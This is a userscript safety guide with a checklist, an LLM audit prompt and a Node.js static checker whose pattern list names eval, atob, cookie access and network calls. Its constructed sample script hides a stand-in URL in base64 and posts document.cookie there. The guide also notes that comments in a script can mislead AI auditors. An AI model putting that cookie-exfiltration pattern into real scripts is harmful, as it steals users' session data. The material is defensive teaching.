Userscript Safety Guide
Userscripts can enhance your browsing experience by automating tasks, adding features, or stripping away features you don't want. But with great power comes great responsibility: a userscript runs with whatever access your script manager grants it on every page it matches, so a malicious or careless one can read and change those pages, and anything you are logged into on them, just as easily as a legitimate one can. Here's how to stay safe while using them.
Best Steps Anyone Can Do
First of all, use a reputable userscript manager. The manager is the code that decides what a script may do, so it is the one piece you have to trust outright:
- Firefox + Violentmonkey is pretty much the only good* combination.
- *Good here meaning the only option that is widely used, kept up to date, and free and open-source software.
- Tampermonkey is proprietary, Greasemonkey is quite dated, and the rest are not widely used.
- On Chromium browsers, though, the best option is still Tampermonkey.
Follow these simple steps to check whether a userscript is safe:
- Use trusted sites: Install scripts primarily from established sites like GreasyFork or OpenUserJS, where the source is visible and reviews and ratings exist. Treat ratings as a signal, not a guarantee: a script can be updated to something malicious after it earned them, and your manager will usually pull that update automatically.
- Check permissions: Look at the @match and @include lines in the metadata block to ensure the script only runs on the sites it needs to; a script that advertises one site but matches *://*/* is a red flag. Also read the @grant lines (GM_xmlhttpRequest lets a script send requests to any host, GM_download lets it write files, and unsafeWindow gives it the page's own JavaScript scope, all far beyond what a page-tweaking script needs) and any @require or @resource lines, which pull in remote code that can change after you install the script.
- Use the Script Analyzer: Paste the script into the Tampermonkey Script Security Analyzer (by Ilyax) to spot risky behavior.
- Note: The script analyzer is not an intelligent tool. It is a pattern-matching tool that finds suspicious patterns in scripts; it will flag benign code that happens to use those patterns and miss hostile code that avoids them. It is not a replacement for a full audit of the source code.
-
- Ask an AI: Unless you can read code, your best bet is to ask an AI tool, like ChatGPT or Claude, to audit the script. Paste the whole script, not an excerpt, and treat the answer as a pointer to what to look at rather than a verdict: a model can be fooled by obfuscation, and even by comments inside the script asserting that the code is harmless, so "looks safe" from a model is weak evidence while "this part sends data somewhere" is worth acting on.
Here's a prompt you can use in any LLM to audit a script:
Please audit the following userscript for any security risks or suspicious behavior. Check for the following, among other things:
- Does the script do anything that is not explicitly stated or advertised in its name and description?
- Does the script send data to external servers or make network requests (fetch, XMLHttpRequest, GM_xmlhttpRequest, sendBeacon, WebSocket, or injecting a script or image tag)?
- Does it access sensitive information like cookies, localStorage, sessionStorage, form fields or page content, and what does it do with it?
- Is there any obfuscated code (e.g., code that is hard to read, uses base64 or hex-encoded strings, or hides its functionality)?
- Does it have any unnecessary or overly broad permissions (e.g., @match or @include covering all websites, or @grant lines it does not need)?
- Are there any signs of malicious behavior, such as eval(), new Function(), setTimeout() or setInterval() with a string argument, strings decoded with atob() before being executed or used as a URL, or remote code loaded via @require?
Please provide a summary of the potential risks and whether the script appears safe or not.
Here is the script:
-----------------------
[Replace this with the userscript code]
For Advanced Users
If you're more experienced, you can take these extra steps:
- Manually inspect the code: Read the whole file, not just the top. Look for obfuscated code, strings that are decoded or assembled at runtime, and network requests that send data to external servers; then ask whether each one is needed for what the script claims to do.
- Test in a sandbox: Run the script in a fresh browser profile or a virtual machine with no accounts logged in, open the developer tools, and watch the Network tab for requests to hosts the script has no reason to contact. Note that requests made through GM_xmlhttpRequest are sent by the extension, not the page, so they do not appear in the page's Network tab; to see those, put a local proxy such as mitmproxy in front of the browser or capture the traffic outside it.
- Monitor script behavior: After installing, watch for anything unusual in your browser, such as unexpected redirects, pop-ups, new requests, or changes to pages that the script never advertised. Slowdowns alone are a weak signal.
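The two steps above and the "Check permissions" step earlier can be partly automated. The following is an added example written for this guide in plain JavaScript (it runs under Node with no dependencies); it is not the Tampermonkey Script Security Analyzer and not code from any script manager. It parses the ==UserScript== header, flags broad @match/@include scopes, risky @grant values and @require/@resource URLs with no integrity hash, then searches the body for the patterns the checklist asks about. The scope list, the API names, the body patterns and the two sample scripts are my own constructed choices; the integrity check assumes the "#sha256=" URL-fragment form that Tampermonkey documents for @require.

```javascript
// Added example for this guide; it is not the Tampermonkey Script Security Analyzer and
// not a substitute for reading the code. A hit means "read this part closely"; silence
// proves nothing. Pattern lists and both sample scripts below are constructed.
const BROAD_SCOPE = [
  /^\*$/,                  // @include *
  /^<all_urls>$/,          // @match <all_urls>
  /^\*:\/\/\*\/\*?$/,      // @match *://*/*
  /^https?:\/\/\*\/\*?$/,  // @match https://*/*
  /^\/\.\*\/$/,            // @include /.*/  (regex form)
];

// GM APIs that reach beyond the current page: any host, cookies, disk, the page's own scope.
const RISKY_GRANTS = new Set(['GM_xmlhttpRequest', 'GM.xmlHttpRequest', 'GM_cookie',
  'GM.cookie', 'GM_download', 'GM.download', 'unsafeWindow']);

// Body patterns, roughly one per question in the audit checklist above.
const BODY_PATTERNS = [
  { id: 'eval',          re: /\beval\s*\(/ },
  { id: 'function-ctor', re: /\bFunction\s*\(/ },
  { id: 'string-timer',  re: /\bset(?:Timeout|Interval)\s*\(\s*['"`]/ },
  { id: 'decode',        re: /\batob\s*\(|(?:\\x[0-9a-f]{2}){4,}/i },
  { id: 'network',       re: /\bfetch\s*\(|\bXMLHttpRequest\b|GM[_.]xml[Hh]ttpRequest|navigator\.sendBeacon|\bnew\s+WebSocket\b/ },
  { id: 'cookies',       re: /document\.cookie|GM[_.]cookie/ },
  { id: 'storage',       re: /\blocalStorage\b|\bsessionStorage\b|\bindexedDB\b/ },
  { id: 'remote-script', re: /createElement\s*\(\s*['"`]script['"`]\s*\)|\.src\s*=\s*['"`]https?:/ },
];
const HEADER_RE = /\/\/\s*==UserScript==\r?\n([\s\S]*?)\/\/\s*==\/UserScript==/;

// Parse "// @key value" header lines into { key: [value, ...] }; null if there is no header.
function parseMetadata(src) {
  const block = src.match(HEADER_RE);
  if (!block) return null;
  const meta = {};
  for (const line of block[1].split(/\r?\n/)) {
    const m = line.match(/^\s*\/\/\s*@([\w:-]+)\s*(.*?)\s*$/);
    if (!m) continue;
    (meta[m[1]] = meta[m[1]] || []).push(m[2]);
  }
  return meta;
}

function checkMetadata(meta) {
  if (!meta) return [{ id: 'no-header', detail: 'no ==UserScript== block, so the manager cannot scope it' }];
  const findings = [];
  for (const key of ['match', 'include']) {
    for (const pat of meta[key] || []) {
      if (BROAD_SCOPE.some((re) => re.test(pat))) findings.push({ id: 'broad-scope', detail: `@${key} ${pat}` });
    }
  }
  for (const g of meta.grant || []) {
    if (RISKY_GRANTS.has(g)) findings.push({ id: 'risky-grant', detail: `@grant ${g}` });
  }
  // @require is a bare URL, @resource is "name URL". Remote code with no integrity hash can change
  // after install. Assumes the "#sha256=" fragment form Tampermonkey documents; check your manager.
  for (const key of ['require', 'resource']) {
    for (const entry of meta[key] || []) {
      const url = entry.trim().split(/\s+/).pop();
      if (/^https?:\/\//i.test(url) && !/#(?:sha256|sha384|sha512)[=-]/i.test(url)) {
        findings.push({ id: 'unpinned-remote', detail: `@${key} ${url}` });
      }
    }
  }
  return findings;
}

function checkBody(src) {
  const body = src.replace(HEADER_RE, '');  // header lines would trip the cookie/network patterns
  return BODY_PATTERNS.filter(({ re }) => re.test(body))
    .map(({ id, re }) => ({ id, detail: body.match(re)[0].trim() }));
}

function audit(src) {
  const meta = parseMetadata(src);
  return { meta, findings: [...checkMetadata(meta), ...checkBody(src)] };
}
const summarize = (src) => audit(src).findings.map((f) => f.id);  // finding ids only

// Constructed: advertised as an ad remover, matches every site, and posts cookies to a
// base64-hidden URL that a plain text search for the host name would never find.
const SUSPICIOUS = `// ==UserScript==
// @name         Ad Remover Plus
// @match        *://*/*
// @grant        GM_xmlhttpRequest
// @require      https://cdn.example.invalid/lib.js
// ==/UserScript==
document.querySelectorAll('.ad').forEach((el) => el.remove());
const sink = atob('aHR0cHM6Ly9jb2xsZWN0b3IuZXhhbXBsZS5pbnZhbGlkL2xvZw==');
GM_xmlhttpRequest({ method: 'POST', url: sink, data: document.cookie });`;

// Constructed: the same feature done honestly, one site, no grants.
const BENIGN = `// ==UserScript==
// @name         Ad Remover
// @match        https://news.example.invalid/*
// @grant        none
// ==/UserScript==
document.querySelectorAll('.ad').forEach((el) => el.remove());`;

for (const f of audit(SUSPICIOUS).findings) console.log(`${f.id}: ${f.detail}`);
console.log(`benign script: ${summarize(BENIGN).length} finding(s)`);
```

Save it as audit.js, replace the SUSPICIOUS constant with the script you are evaluating (or read it from a file), and run node audit.js. Every finding is a place to read, not a conviction: a legitimate script that syncs settings will trip "network" and "storage", and a hostile one can dodge every pattern here by building its strings at runtime, which is exactly why the guide says to read the code and watch the traffic as well.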
Clippy wants you to stay safe.